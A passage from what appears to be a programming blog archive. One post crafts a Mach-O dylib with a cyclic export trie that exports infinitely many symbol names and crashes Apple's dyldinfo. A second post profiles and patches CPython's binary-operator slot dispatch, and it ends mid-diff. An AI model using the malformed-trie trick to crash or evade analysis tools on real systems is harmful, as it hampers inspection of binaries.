Our aim is to replace the exported symbol trie with something like the
following diagram:
                 +-<---"_"---+
                 |           |
root -"_corsix"--+-> corsix -+
                 |           |
                 +-<---"a"---+
                 |           |
                 +-<---"b"---+
                 |           |
                 +-<---"c"---+
                 |           |
                 +-<---"d"---+
                 |           |
                 +-<---"e"---+
With such a trie, the symbol originally called corsix should now be
exported under all the names matching the regex corsix[_a-e]*. We
could also go slightly further, adding more looping edges to the trie,
in order to reach corsix[_a-z0-9]*.
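To see why a cycle makes the set of exported names infinite, here is a minimal in-memory model of such a trie. It is a sketch only: the `Node` class, the `lookup` function, and the placeholder address are inventions for this example, and it does not reflect the binary layout of the Mach-O trie or how dyld walks it.

```python
class Node:
    """One trie node: an optional exported address plus labelled edges."""
    def __init__(self, address=None):
        self.address = address
        self.edges = {}  # edge label -> child Node

def lookup(root, name):
    """Follow edges whose labels spell out `name`; return the address or None."""
    node = root
    while name:
        for label, child in node.edges.items():
            if name.startswith(label):
                node, name = child, name[len(label):]
                break
        else:
            return None  # no edge matches the remaining characters
    return node.address

# root -"_corsix"-> corsix, then one looping edge per character in [_a-e].
root = Node()
corsix = Node(address=0x7B0)   # placeholder address for the example
root.edges["_corsix"] = corsix
for ch in "_abcde":
    corsix.edges[ch] = corsix  # the cycle: each edge points back at corsix

for name in ["_corsix", "_corsix_abc", "_corsix_xyz", "_foobar23"]:
    print(name, lookup(root, name))
```

Every name matching `_corsix[_a-e]*` ends its walk on the same node, so they all resolve to the same address, while a name such as `_corsix_xyz` falls off the graph because there is no edge labelled `x`. The lookup still terminates, since each step consumes at least one character of the name.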
We'll use the following transform.lua program to do the dirty work of
trie replacement:
dylib = io.read"*a"
nof, pos, tsz = dylib:match"_corsix%z(.)()(.)"
node = dylib:sub(pos, pos + tsz:byte()) .. "\37" ..
  ("_abcdefghijklmnopqrstuvwxyz0123456789"):gsub(".", "%0\0" .. nof)
io.write(dylib:sub(1, pos-1) .. node .. dylib:sub(pos + #node))
Running the program like so will generate a file called infinite.dylib:
$ lua transform.lua <finite.dylib >infinite.dylib
We'll then use the following client.cpp program to query the exported
symbols of the two .dylib files:
#include <dlfcn.h>
#include <stdio.h>

void check_dylib(const char* path) {
  void* dylib = dlopen(path, RTLD_LOCAL);
  printf("\nName lookup results in %s:\n", path);
  const char* names[] = {
    "foobar23", "corsix", "corsix_aaa", "corsix_abc",
    "corsix_xyz", "corsix_foobar23", "corsix_dot_org"
  };
  for (const char* name : names) {
    printf("%-15s -> %p\n", name, dlsym(dylib, name));
  }
}

int main() {
  check_dylib("./finite.dylib");
  check_dylib("./infinite.dylib");
  return 0;
}
Compiling and running gives the following output:
$ clang -std=c++11 client.cpp && ./a.out

Name lookup results in ./finite.dylib:
foobar23        -> 0x0
corsix          -> 0x1076347b0
corsix_aaa      -> 0x1076347d0
corsix_abc      -> 0x107634840
corsix_xyz      -> 0x0
corsix_foobar23 -> 0x0
corsix_dot_org  -> 0x0

Name lookup results in ./infinite.dylib:
foobar23        -> 0x0
corsix          -> 0x1076377b0
corsix_aaa      -> 0x1076377b0
corsix_abc      -> 0x1076377b0
corsix_xyz      -> 0x1076377b0
corsix_foobar23 -> 0x1076377b0
corsix_dot_org  -> 0x1076377b0
I don't know of any particularly useful reason for exporting an infinite number of symbols,
but it does trip up Apple's dyldinfo tool,
and it might also trip up other tools of a similar nature:
$ dyldinfo -export infinite.dylib
export information (from trie):
Segmentation fault: 11
$ dyldinfo -export_dot infinite.dylib
digraph {
node000;
node000 -> node011 [ label=_corsix ] ;
node011 [ label=_corsix,addr0x000007B0 ];
node011 -> node011 [ label=_ ] ;
node011 [ label=_corsix_,addr0x000007B0 ];
node011 -> node011 [ label=_ ] ;
node011 [ label=_corsix__,addr0x000007B0 ];
node011 -> node011 [ label=_ ] ;
node011 [ label=_corsix___,addr0x000007B0 ];
node011 -> node011 [ label=_ ] ;
node011 [ label=_corsix____,addr0x000007B0 ];
node011 -> node011 [ label=_ ] ;
node011 [ label=_corsix_____,addr0x000007B0 ];
node011 -> node011 [ label=_ ] ;
node011 [ label=_corsix______,addr0x000007B0 ];
node011 -> node011 [ label=_ ] ;
node011 [ label=_corsix_______,addr0x000007B0 ];
node011 -> node011 [ label=_ ] ;
node011 [ label=_corsix________,addr0x000007B0 ];
... 15000 lines of output omitted ...
Segmentation fault: 11
Why are slots so slow?
Posted on May 3, 2015
One of the points in Armin Ronacher's The Python I Would Like To See is that slots are slow. That is, A() + A() is slower than A().__add__(A()) in the context of the following:
class A(object):
    def __add__(self, other):
        return 42
I'd like to investigate this claim for myself. To begin, let us repeat the experiment and see whether we get the same result:
$ cat x.py
class A(object):
    def __add__(self, other):
        return 42
$ ./python.exe
Python 3.5.0a4+ (default, Apr 25 2015, 21:57:28)
[GCC 4.2.1 Compatible Apple LLVM 6.1.0 (clang-602.0.49)] on darwin
Type "help", "copyright", "credits" or "license" for more information.
>>> from x import A
>>> a = A()
>>> b = A()
>>> a + b
42
>>> quit()
$ ./python.exe -mtimeit -s 'from x import A; a = A(); b = A()' 'a + b'
1000000 loops, best of 3: 0.215 usec per loop
$ ./python.exe -mtimeit -s 'from x import A; a = A(); b = A()' 'a.__add__(b)'
10000000 loops, best of 3: 0.113 usec per loop
It would seem that Armin's claim stands up; a + b is indeed considerably slower than a.__add__(b).
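The same comparison can be run from inside Python with the standard `timeit` module. This is a sketch of the experiment rather than a benchmark to rely on: the loop count and repeat count are arbitrary choices, and the ratio between the two timings depends heavily on the interpreter version, so newer CPython releases may not reproduce the gap measured above.

```python
import timeit

class A(object):
    def __add__(self, other):
        return 42

a, b = A(), A()
env = {"a": a, "b": b}

# Best of three runs of 100,000 evaluations each, as seconds per run.
t_operator = min(timeit.repeat("a + b", globals=env, number=100000, repeat=3))
t_method = min(timeit.repeat("a.__add__(b)", globals=env, number=100000, repeat=3))

print("a + b        : %.3f usec per loop" % (t_operator / 100000 * 1e6))
print("a.__add__(b) : %.3f usec per loop" % (t_method / 100000 * 1e6))
```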
First of all, an implicit assumption of Armin's claim is that a + b should be equivalent to a.__add__(b). Let us check this assumption by asking: what does a + b mean in Python? The documentation for + is probably a good place to start:
The + (addition) operator yields the sum of its arguments. The arguments must either both be numbers or both be sequences of the same type. In the former case, the numbers are converted to a common type and then added together. In the latter case, the sequences are concatenated.
Well, uh, that doesn't explain the observed behaviour of a + b giving 42. Perhaps the documentation for __add__ will shed some light on the situation:
These methods are called to implement the binary arithmetic operations (+, [...]). For instance, to evaluate the expression x + y, where x is an instance of a class that has an __add__() method, x.__add__(y) is called. [...] If one of those methods does not support the operation with the supplied arguments, it should return NotImplemented.
Well, that explains the observed behaviour, and seems to pretty much straight up say that a + b means a.__add__(b). However, let's not get ahead of ourselves. On the off chance that it is relevant, let's consider the documentation for __radd__:
These methods are called to implement the binary arithmetic operations (+, [...]) with reflected (swapped) operands. These functions are only called if the left operand does not support the corresponding operation and the operands are of different types. For instance, to evaluate the expression x - y, where y is an instance of a class that has an __rsub__() method, y.__rsub__(x) is called if x.__sub__(y) returns NotImplemented.
Well, whad'ya know, it was relevant. With this extra bit of information, it seems like a + b is equivalent to something like:
if __add__ in a:
    tmp = a.__add__(b)
else:
    tmp = NotImplemented
if tmp is NotImplemented and type(a) != type(b):
    return b.__radd__(a)
else:
    return tmp
Of course, the story doesn't end there; immediately after the piece of documentation quoted above is the following gem:
Note: If the right operand’s type is a subclass of the left operand’s type and that subclass provides the reflected method for the operation, this method will be called before the left operand’s non-reflected method. This behavior allows subclasses to override their ancestors’ operations.
Bearing this in mind, maybe a + b is equivalent to something like:
if issubclass(type(b), type(a)) and __radd__ in b:
    tmp = b.__radd__(a)
    if tmp is not NotImplemented:
        return tmp
if __add__ in a:
    tmp = a.__add__(b)
else:
    tmp = NotImplemented
if tmp is NotImplemented and type(a) != type(b):
    return b.__radd__(a)
else:
    return tmp
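The subclass rule from the note is easy to observe directly. The class names below are invented for the demonstration; the behaviour shown is that of Python 3.

```python
class Base(object):
    def __add__(self, other):
        return "Base.__add__"

class Derived(Base):
    def __radd__(self, other):
        return "Derived.__radd__"

class Unrelated(object):
    def __radd__(self, other):
        return "Unrelated.__radd__"

print(Base() + Base())       # Base.__add__
print(Base() + Derived())    # Derived.__radd__ (subclass is asked first)
print(Base() + Unrelated())  # Base.__add__ (not a subclass, so no priority)
```

Only the right operand whose type is a subclass of the left operand's type gets to jump the queue; an unrelated type with `__radd__` is consulted only if `Base.__add__` returns NotImplemented.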
I wish that the above were the full story, but alas it is not. Let us pluck another link out of thin air, this time to the documentation on special method lookup:
For custom classes, implicit invocations of special methods are only guaranteed to work correctly if defined on an object’s type, not in the object’s instance dictionary. [...] In addition to bypassing any instance attributes in the interest of correctness, implicit special method lookup generally also bypasses the __getattribute__() method even of the object’s metaclass.
I like to interpret this paragraph as saying "bugger it, a + b means whatever the CPython interpreter does for a + b". Having studied the interpreter, the meaning of a + b is equivalent to something along the lines of the following:
def get(x, field):
    try:
        return getattr(type(x), field) # Doesn't call __getattribute__
    except AttributeError:
        return None

def has(x, field):
    return get(x, field) is not None

# From now on, `x.__yzw__` means `get(x, '__yzw__')`
# and `__abc__ in d` means `has(d, '__abc__')`

def tp_add_slot(x):
    if x is a builtin type or a type from a C extension:
        return ?
    elif __add__ in x or __radd__ in x:
        return slot_nb_add
    else:
        return None

def sq_concat_slot(x):
    return ?

def slot_nb_add(x, y):
    do_other = type(x) != type(y) and tp_add_slot(y) == slot_nb_add and __radd__ in y
    if tp_add_slot(x) == slot_nb_add:
        if do_other and issubclass(type(y), type(x)) and (__radd__ not in x or x.__radd__ != y.__radd__):
            tmp = y.__radd__(x)
            if tmp is NotImplemented:
                do_other = False
            else:
                return tmp
        if __add__ in x:
            tmp = x.__add__(y)
            if tmp is not NotImplemented:
                return tmp
    if do_other:
        return y.__radd__(x)
    return NotImplemented

slota = tp_add_slot(a)
slotb = tp_add_slot(b)
slotc = sq_concat_slot(a)
if slota == slotb:
    return slota(a, b)
if slota is not None and slotb is not None and issubclass(type(b), type(a)):
    tmp = slotb(a, b)
    if tmp is NotImplemented:
        slotb = None
    else:
        return tmp
if slota is not None:
    tmp = slota(a, b)
    if tmp is not NotImplemented:
        return tmp
if slotb is not None:
    tmp = slotb(a, b)
    if tmp is not NotImplemented:
        return tmp
if slotc is None:
    raise error
else:
    return slotc(a, b)
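One consequence of looking special methods up on the type rather than on the instance can be checked in a few lines. The replacement lambda is made up for the demonstration.

```python
class A(object):
    def __add__(self, other):
        return 42

a, b = A(), A()

# Shadow __add__ in the instance dictionary only.
a.__add__ = lambda other: "from the instance dictionary"

print(a + b)          # 42: the operator looks at type(a) and ignores the instance
print(a.__add__(b))   # from the instance dictionary: plain attribute lookup
```

So even for two operands of the same type, `a + b` and `a.__add__(b)` are not interchangeable in general.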
The conclusion of the above exploration is that a + b has a rather more nuanced meaning than just a.__add__(b). If we accept this conclusion, then perhaps it shouldn't be surprising that a + b is slower than a.__add__(b). However, in our case, a and b are the same type, so the above pseudo-code should pretty quickly conclude that the meaning of a + b, in our case, is just a.__add__(b).
Let us consider an alternative conclusion: the people behind the CPython interpreter have spent more time optimising a.__add__(b) than they have spent optimising a + b. To test this hypothesis, we need to dig into the bytecode of these two expressions. If we ignore the bytecode which is common to both expressions, then we can say that a.__add__(b) consists of two bytecode instructions (LOAD_ATTR and CALL_FUNCTION), while a + b consists of just a single bytecode instruction (BINARY_ADD).
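The bytecode for the two expressions can be listed with the standard `dis` module. This is a sketch for inspection only: the helper name `opnames` is made up, and opcode names vary between CPython versions, so the interpreter you run this on may print names other than the LOAD_ATTR, CALL_FUNCTION and BINARY_ADD discussed here.

```python
import dis

def opnames(expression):
    """Return the opcode names CPython compiles `expression` to."""
    code = compile(expression, "<example>", "eval")
    return [instruction.opname for instruction in dis.get_instructions(code)]

print(opnames("a + b"))
print(opnames("a.__add__(b)"))
```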
Let's begin with a.__add__(b) and look at what happens when the bytecode is executed:
1. Begin LOAD_ATTR instruction.
2. Call PyObject_GetAttr.
3. Call PyObject_GenericGetAttr (via the tp_getattro slot in type(a)).
4. Call _PyObject_GenericGetAttrWithDict.
5. Call _PyType_Lookup.
6. Successfully find __add__ in the method cache.
7. Return a function object to _PyObject_GenericGetAttrWithDict.
8. Call func_descr_get (via the tp_descr_get slot in the type of the function object).
9. Call PyMethod_New (to bind a to the first argument of the function).
10. Return a method object from PyObject_GetAttr.
11. Push the method object onto the stack.
12. End LOAD_ATTR instruction.
13. Begin CALL_FUNCTION instruction.
14. Call call_function.
15. Realise that we have a method object.
16. Replace the stack entry underneath b with the bound argument from the method object.
17. Call fast_function with the function from the method object.
18. Call PyFrame_New to create a new stack frame.
19. Call PyEval_EvalFrameEx to actually evaluate our __add__ code.
20. Return 42 from call_function.
21. Free the method object.
22. End CALL_FUNCTION instruction.
On the other hand, for a + b, we have:
1. Begin BINARY_ADD instruction.
2. Call PyNumber_Add.
3. Call binary_op1.
4. Call slot_nb_add (via the tp_add slot in type(a)) [slot_nb_add is defined via a SLOT1BIN macro].
5. Call call_maybe(a, &Id__add__, "(O)", b) [call_maybe is variadic after the string parameter].
6. Call lookup_maybe [lookup_maybe is like PyObject_GetAttr, but only looks in the type, and doesn't invoke __getattribute__].
7. Call _PyType_LookupId.
8. Call _PyUnicode_FromId [this converts Id__add__ into a PyObject representing "__add__", but this conversion is cached, and therefore effectively free].
9. Call _PyType_Lookup [as in step 5 above].
10. Successfully find __add__ in the method cache [as in step 6 above].
11. Return a function object from _PyType_LookupId.
12. Call func_descr_get (via the tp_descr_get slot in the type of the function object) [as in step 8 above].
13. Call PyMethod_New (to bind a to the first argument of the function) [as in step 9 above].
14. Return a method object from lookup_maybe.
15. Call Py_VaBuildValue, passing the string literal "(O)" and a reference to call_maybe's variadic arguments.
16. Do a tonne of string literal parsing and variadic argument fetching and tuple construction, resulting in Py_VaBuildValue eventually returning a singleton tuple containing b.
17. Call method_call (via the tp_call slot in the type of the method object).
18. Construct a new two-element tuple, filling it with the bound argument from the method object, and the contents of the previously constructed singleton tuple. In other words, we now have the tuple (a, b).
19. Call function_call (via the tp_call slot in the type of the function from the method object).
20. Call PyEval_EvalCodeEx.
21. Call _PyEval_EvalCodeWithName.
22. Call PyFrame_New to create a new stack frame [as in step 18 above].
23. Call PyEval_EvalFrameEx to actually evaluate our __add__ code [as in step 19 above].
24. Return 42 from function_call.
25. Free the two-element tuple.
26. Return 42 from method_call.
27. Free the singleton tuple.
28. Free the method object.
29. Return 42 from PyNumber_Add.
30. End BINARY_ADD instruction.
One obvious difference is that a + b does far more manipulation of tuples and of variadic arguments. Given that call_maybe is always called with a format of "(O)", let's acknowledge this by changing its signature to be fixed-arg rather than vararg, and also construct an argument tuple via PyTuple_New / PyTuple_SET_ITEM rather than Py_VaBuildValue:
```diff
diff --git a/Objects/typeobject.c b/Objects/typeobject.c
index 4b99287..d27cc07 100644
--- a/Objects/typeobject.c
+++ b/Objects/typeobject.c
@@ -1465,29 +1465,22 @@ call_method(PyObject *o, _Py_Identifier *nameid, char *format, ...)
 /* Clone of call_method() that returns NotImplemented when the lookup fails. */
 
 static PyObject *
-call_maybe(PyObject *o, _Py_Identifier *nameid, char *format, ...)
+call_maybe(PyObject *o, _Py_Identifier *nameid, PyObject* p)
 {
-    va_list va;
     PyObject *args, *func = 0, *retval;
-    va_start(va, format);
 
     func = lookup_maybe(o, nameid);
     if (func == NULL) {
-        va_end(va);
         if (!PyErr_Occurred())
             Py_RETURN_NOTIMPLEMENTED;
         return NULL;
     }
 
-    if (format && *format)
-        args = Py_VaBuildValue(format, va);
-    else
-        args = PyTuple_New(0);
-
-    va_end(va);
-
+    args = PyTuple_New(1);
     if (args == NULL)
         return NULL;
+    PyTuple_SET_ITEM(args, 0, p);
+    Py_XINCREF(p);
 
     assert(PyTuple_Check(args));
     retval = PyObject_Call(func, args, NULL);
@@ -5624,20 +5617,20 @@ FUNCNAME(PyObject *self, PyObject *other) \
         if (do_other && \
             PyType_IsSubtype(Py_TYPE(other), Py_TYPE(self)) && \
             method_is_overloaded(self, other, &rop_id)) { \
-            r = call_maybe(other, &rop_id, "(O)", self); \
+            r = call_maybe(other, &rop_id, self); \
             if (r != Py_NotImplemented) \
                 return r; \
             Py_DECREF(r); \
             do_other = 0; \
         } \
-        r = call_maybe(self, &op_id, "(O)", other); \
+        r = call_maybe(self, &op_id, other); \
         if (r != Py_NotImplemented || \
             Py_TYPE(other) == Py_TYPE(self)) \
             return r; \
         Py_DECREF(r); \
     } \
     if (do_other) { \
-        return call_maybe(other, &rop_id, "(O)", self); \
+        return call_maybe(other, &rop_id, self); \
     } \
     Py_RETURN_NOTIMPLEMENTED; \
 }
```
This gives a nice little speedup; we're down from 0.215 usec to 0.176 usec:
```
$ make python.exe
...
$ ./python.exe -mtimeit -s 'from x import A; a = A(); b = A()' 'a + b'
10000000 loops, best of 3: 0.176 usec per loop
```
We're still falling somewhat short of the 0.113 usec time set by a.__add__(b), so let's copy step 15 of a.__add__(b) and special-case method objects:
```diff
diff --git a/Objects/typeobject.c b/Objects/typeobject.c
index 4b99287..2cd8e23 100644
--- a/Objects/typeobject.c
+++ b/Objects/typeobject.c
@@ -1465,36 +1465,43 @@ call_method(PyObject *o, _Py_Identifier *nameid, char *format, ...)
 /* Clone of call_method() that returns NotImplemented when the lookup fails. */
 
 static PyObject *
-call_maybe(PyObject *o, _Py_Identifier *nameid, char *format, ...)
+call_maybe(PyObject *o, _Py_Identifier *nameid, PyObject* p)
 {
-    va_list va;
-    PyObject *args, *func = 0, *retval;
-    va_start(va, format);
+    PyObject *args[2], *func = 0, *retval, *tuple;
+    int na = 1;
 
     func = lookup_maybe(o, nameid);
     if (func == NULL) {
-        va_end(va);
         if (!PyErr_Occurred())
             Py_RETURN_NOTIMPLEMENTED;
         return NULL;
     }
 
-    if (format && *format)
-        args = Py_VaBuildValue(format, va);
-    else
-        args = PyTuple_New(0);
-
-    va_end(va);
-
-    if (args == NULL)
-        return NULL;
+    args[1] = p;
+    if (PyMethod_Check(func) && PyMethod_GET_SELF(func) != NULL) {
+        PyObject *mself = PyMethod_GET_SELF(func);
+        PyObject *mfunc = PyMethod_GET_FUNCTION(func);
+        args[0] = mself;
+        na = 2;
+        Py_INCREF(mfunc);
+        Py_DECREF(func);
+        func = mfunc;
+    } else {
+        args[0] = NULL;
+    }
 
-    assert(PyTuple_Check(args));
-    retval = PyObject_Call(func, args, NULL);
+    tuple = PyTuple_New(na);
+    if (tuple == NULL) {
+        retval = NULL;
+    } else {
+        memcpy(((PyTupleObject *)tuple)->ob_item, &args[2 - na], sizeof(PyObject*) * na);
+        Py_XINCREF(args[0]);
+        Py_XINCREF(args[1]);
+        retval = PyObject_Call(func, tuple, NULL);
+        Py_DECREF(tuple);
+    }
 
-    Py_DECREF(args);
     Py_DECREF(func);
-
     return retval;
 }
 
@@ -5624,20 +5631,20 @@ FUNCNAME(PyObject *self, PyObject *other) \
         if (do_other && \
             PyType_IsSubtype(Py_TYPE(other), Py_TYPE(self)) && \
             method_is_overloaded(self, other, &rop_id)) { \
-            r = call_maybe(other, &rop_id, "(O)", self); \
+            r = call_maybe(other, &rop_id, self); \
             if (r != Py_NotImplemented) \
                 return r; \
             Py_DECREF(r); \
             do_other = 0; \
         } \
-        r = call_maybe(self, &op_id, "(O)", other); \
+        r = call_maybe(self, &op_id, other); \
         if (r != Py_NotImplemented || \
             Py_TYPE(other) == Py_TYPE(self)) \
             return r; \
         Py_DECREF(r); \
     } \
     if (do_other) { \
-        return call_maybe(other, &rop_id, "(O)", self); \
+        return call_maybe(other, &rop_id, self); \
     } \
     Py_RETURN_NOTIMPLEMENTED; \
 }
```
This gives another nice little speedup; we're down from 0.176 usec to 0.155 usec:
```
$ make python.exe
...
$ ./python.exe -mtimeit -s 'from x import A; a = A(); b = A()' 'a + b'
10000000 loops, best of 3: 0.155 usec per loop
```
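The idea of special-casing method objects can be illustrated in pure Python. The helper below is a hypothetical analogue, not a translation of the C patch: `call_maybe_unwrapped` is an invented name, and `getattr` only approximates `lookup_maybe` (unlike the C function, it also consults the instance dictionary).

```python
import types


class A:
    # Assumed stand-in for the benchmark class; __add__ returns 42.
    def __add__(self, other):
        return 42


def call_maybe_unwrapped(o, name, p):
    """Hypothetical analogue of call_maybe with the method special case."""
    func = getattr(o, name, None)  # approximates lookup_maybe
    if func is None:
        return NotImplemented
    if isinstance(func, types.MethodType):
        # Unwrap the bound method and pass its self explicitly, so one
        # two-element argument tuple is built instead of two tuples.
        args = (func.__self__, p)
        func = func.__func__
    else:
        # Anything else (e.g. a built-in method wrapper) is called as-is.
        args = (p,)
    return func(*args)


print(call_maybe_unwrapped(A(), "__add__", A()))
print(call_maybe_unwrapped(3, "__add__", 4))
```

The second call exercises the fallback branch: `int.__add__` is not a Python-level method object, so it is invoked with the single argument.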
Even better would be to also pull the fast_function trick that the interpreter does at step 17 in order to call a function without creating any argument tuples at all:
```diff
diff --git a/Include/ceval.h b/Include/ceval.h
index 6811367..f0997ac 100644
--- a/Include/ceval.h
+++ b/Include/ceval.h
@@ -10,6 +10,9 @@ extern "C" {
 PyAPI_FUNC(PyObject *) PyEval_CallObjectWithKeywords(
     PyObject *, PyObject *, PyObject *);
 
+PyAPI_FUNC(PyObject *)
+PyEval_FastFunction(PyObject *func, PyObject **stack, int n);
+
 /* Inline this */
 #define PyEval_CallObject(func,arg) \
     PyEval_CallObjectWithKeywords(func, arg, (PyObject *)NULL)
diff --git a/Objects/typeobject.c b/Objects/typeobject.c
index 4b99287..6419ea2 100644
--- a/Objects/typeobject.c
+++ b/Objects/typeobject.c
@@ -1465,36 +1465,47 @@ call_method(PyObject *o, _Py_Identifier *nameid, char *format, ...)
 /* Clone of call_method() that returns NotImplemented when the lookup fails. */
 
 static PyObject *
-call_maybe(PyObject *o, _Py_Identifier *nameid, char *format, ...)
+call_maybe(PyObject *o, _Py_Identifier *nameid, PyObject* p)
 {
-    va_list va;
-    PyObject *args, *func = 0, *retval;
-    va_start(va, format);
+    PyObject *args[2], *func = 0, *retval;
+    int na = 1;
 
     func = lookup_maybe(o, nameid);
     if (func == NULL) {
-        va_end(va);
         if (!PyErr_Occurred())
             Py_RETURN_NOTIMPLEMENTED;
         return NULL;
     }
 
-    if (format && *format)
-        args = Py_VaBuildValue(format, va);
-    else
-        args = PyTuple_New(0);
-
-    va_end(va);
-
-    if (args == NULL)
-        return NULL;
+    args[1] = p;
+    if (PyMethod_Check(func) && PyMethod_GET_SELF(func) != NULL) {
+        PyObject *mself = PyMethod_GET_SELF(func);
+        PyObject *mfunc = PyMethod_GET_FUNCTION(func);
+        args[0] = mself;
+        na = 2;
+        Py_INCREF(mfunc);
+        Py_DECREF(func);
+        func = mfunc;
+    } else {
+        args[0] = NULL;
+    }
 
-    assert(PyTuple_Check(args));
-    retval = PyObject_Call(func, args, NULL);
+    if (PyFunction_Check(func)) {
+        retval = PyEval_FastFunction(func, &args[2], na);
+    } else {
+        PyObject* tuple = PyTuple_New(na);
+        if (tuple == NULL) {
+            retval = NULL;
+        } else {
+            memcpy(((PyTupleObject *)tuple)->ob_item, &args[2 - na], sizeof(PyObject*) * na);
+            Py_XINCREF(args[0]);
+            Py_XINCREF(args[1]);
+            retval = PyObject_Call(func, tuple, NULL);
+            Py_DECREF(tuple);
+        }
+    }
 
-    Py_DECREF(args);
     Py_DECREF(func);
-
     return retval;
 }
 
@@ -5624,20 +5635,20 @@ FUNCNAME(PyObject *self, PyObject *other) \
         if (do_other && \
             PyType_IsSubtype(Py_TYPE(other), Py_TYPE(self)) && \
             method_is_overloaded(self, other, &rop_id)) { \
-            r = call_maybe(other, &rop_id, "(O)", self); \
+            r = call_maybe(other, &rop_id, self); \
             if (r != Py_NotImplemented) \
                 return r; \
             Py_DECREF(r); \
             do_other = 0; \
         } \
-        r = call_maybe(self, &op_id, "(O)", other); \
+        r = call_maybe(self, &op_id, other); \
         if (r != Py_NotImplemented || \
             Py_TYPE(other) == Py_TYPE(self)) \
             return r; \
         Py_DECREF(r); \
     } \
     if (do_other) { \
-        return call_maybe(other, &rop_id, "(O)", self); \
+        return call_maybe(other, &rop_id, self); \
     } \
     Py_RETURN_NOTIMPLEMENTED; \
 }
diff --git a/Python/ceval.c b/Python/ceval.c
index 2f3d3ad..bf6aedc 100644
--- a/Python/ceval.c
+++ b/Python/ceval.c
@@ -4329,6 +4329,12 @@ call_function(PyObject ***pp_stack, int oparg
     return x;
 }
 
+PyAPI_FUNC(PyObject *)
+PyEval_FastFunction(PyObject *func, PyObject **stack, int n)
+{
+    return fast_function(func, &stack, n, n, 0);
+}
+
 /* The fast_function() function optimize calls for which no argument
    tuple is necessary; the objects are passed directly from the stack.
    For the simplest case -- a function that takes only positional
```
And with that, we're down from 0.155 usec to 0.113 usec:
```
$ make python.exe
...
$ ./python.exe -mtimeit -s 'from x import A; a = A(); b = A()' 'a + b'
10000000 loops, best of 3: 0.113 usec per loop
```
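To compare the two spellings side by side on whatever interpreter is at hand, a small harness along these lines may help. It is a sketch under assumptions: `A` is a guess at the class in the benchmark module `x`, the loop count is arbitrary, and the absolute numbers depend on the machine and Python version, so they will not match the figures quoted here.

```python
import timeit


class A:
    # Assumed stand-in for the benchmark class; __add__ returns 42.
    def __add__(self, other):
        return 42


env = {"a": A(), "b": A()}
loops = 100_000  # arbitrary; the command-line tool picks its own count

results = {}
for stmt in ("a + b", "a.__add__(b)"):
    # Like the timeit command line, report the best of three runs.
    best = min(timeit.repeat(stmt, globals=env, number=loops, repeat=3))
    results[stmt] = best / loops * 1e6
    print(f"{stmt:<14} {results[stmt]:.4f} usec per loop")
```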
So, it seems that slots aren't intrinsically slow. Provided that the implementation of slots in typeobject.c is taught to use the exact same tricks that the interpreter does, then they are the exact same speed as non-slots. We could even go further and elide construction of the method object entirely:
```diff
diff --git a/Include/ceval.h b/Include/ceval.h
index 6811367..f0997ac 100644
--- a/Include/ceval.h
+++ b/Include/ceval.h
@@ -10,6 +10,9 @@ extern "C" {
 PyAPI_FUNC(PyObject *) PyEval_CallObjectWithKeywords(
     PyObject *, PyObject *, PyObject *);
 
+PyAPI_FUNC(PyObject *)
+PyEval_FastFunction(PyObject *func, PyObject **stack, int n);
+
 /* Inline this */
 #define PyEval_CallObject(func,arg) \
     PyEval_CallObjectWithKeywords(func, arg, (PyObject *)NULL)
diff --git a/Objects/typeobject.c b/Objects/typeobject.c
index 4b99287..c4ffa70 100644
--- a/Objects/typeobject.c
+++ b/Objects/typeobject.c
@@ -1465,36 +1465,64 @@ call_method(PyObject *o, _Py_Identifier *nameid, char *format, ...)
 /* Clone of call_method() that returns NotImplemented when the lookup fails. */
 
 static PyObject *
-call_maybe(PyObject *o, _Py_Identifier *nameid, char *format, ...)
+call_maybe(PyObject *o, _Py_Identifier *nameid, PyObject* p)
 {
-    va_list va;
-    PyObject *args, *func = 0, *retval;
-    va_start(va, format);
+    PyObject *args[2], *func = 0, *retval;
+    int na = 2;
 
-    func = lookup_maybe(o, nameid);
+    args[1] = p;
+    func = _PyType_LookupId(Py_TYPE(o), nameid);
     if (func == NULL) {
-        va_end(va);
         if (!PyErr_Occurred())
             Py_RETURN_NOTIMPLEMENTED;
         return NULL;
     }
+    if (PyFunction_Check(func)) {
+        Py_INCREF(func);
+        args[0] = o;
+        retval = PyEval_FastFunction(func, &args[2], na);
+    } else {
+        descrgetfunc f = Py_TYPE(func)->tp_descr_get;
+        if (f == NULL) {
+            Py_INCREF(func);
+        } else {
+            func = f(func, o, (PyObject *)(Py_TYPE(o)));
+            if (func == NULL) {
+                if (!PyErr_Occurred())
+                    Py_RETURN_NOTIMPLEMENTED;
+                return NULL;
+            }
+        }
 
-    if (format && *format)
-        args = Py_VaBuildValue(format, va);
-    else
-        args = PyTuple_New(0);
-
-    va_end(va);
-
-    if (args == NULL)
-        return NULL;
-
-    assert(PyTuple_Check(args));
-    retval = PyObject_Call(func, args, NULL);
+        if (PyMethod_Check(func) && PyMethod_GET_SELF(func) != NULL) {
+            PyObject *mself = PyMethod_GET_SELF(func);
+            PyObject *mfunc = PyMethod_GET_FUNCTION(func);
+            args[0] = mself;
+            Py_INCREF(mfunc);
+            Py_DECREF(func);
+            func = mfunc;
+        } else {
+            args[0] = NULL;
+            na = 1;
+        }
+
+        if (PyFunction_Check(func)) {
+            retval = PyEval_FastFunction(func, &args[2], na);
+        } else {
+            PyObject* tuple = PyTuple_New(na);
+            if (tuple == NULL) {
+                retval = NULL;
+            } else {
+                memcpy(((PyTupleObject *)tuple)->ob_item, &args[2 - na], sizeof(PyObject*) * na);
+                Py_XINCREF(args[0]);
+                Py_XINCREF(args[1]);
+                retval = PyObject_Call(func, tuple, NULL);
+                Py_DECREF(tuple);
+            }
+        }
+    }
 
-    Py_DECREF(args);
     Py_DECREF(func);
-
     return retval;
 }
 
@@ -5624,20 +5652,20 @@ FUNCNAME(PyObject *self, PyObject *other) \
         if (do_other && \
             PyType_IsSubtype(Py_TYPE(other), Py_TYPE(self)) && \
             method_is_overloaded(self, other, &rop_id)) { \
-            r = call_maybe(other, &rop_id, "(O)", self); \
+            r = call_maybe(other, &rop_id, self); \
             if (r != Py_NotImplemented) \
                 return r; \
             Py_DECREF(r); \
             do_other = 0; \
         } \
-        r = call_maybe(self, &op_id, "(O)", other); \
+        r = call_maybe(self, &op_id, other); \
         if (r != Py_NotImplemented || \
             Py_TYPE(other) == Py_TYPE(self)) \
             return r; \
         Py_DECREF(r); \
     } \
     if (do_other) { \
-        return call_maybe(other, &rop_id, "(O)", self); \
+        return call_maybe(other, &rop_id, self); \
     } \
     Py_RETURN_NOTIMPLEMENTED; \
 }
diff --git a/Python/ceval.c b/Python/ceval.c
index 2f3d3ad..bf6aedc 100644
--- a/Python/ceval.c
+++ b/Python/ceval.c
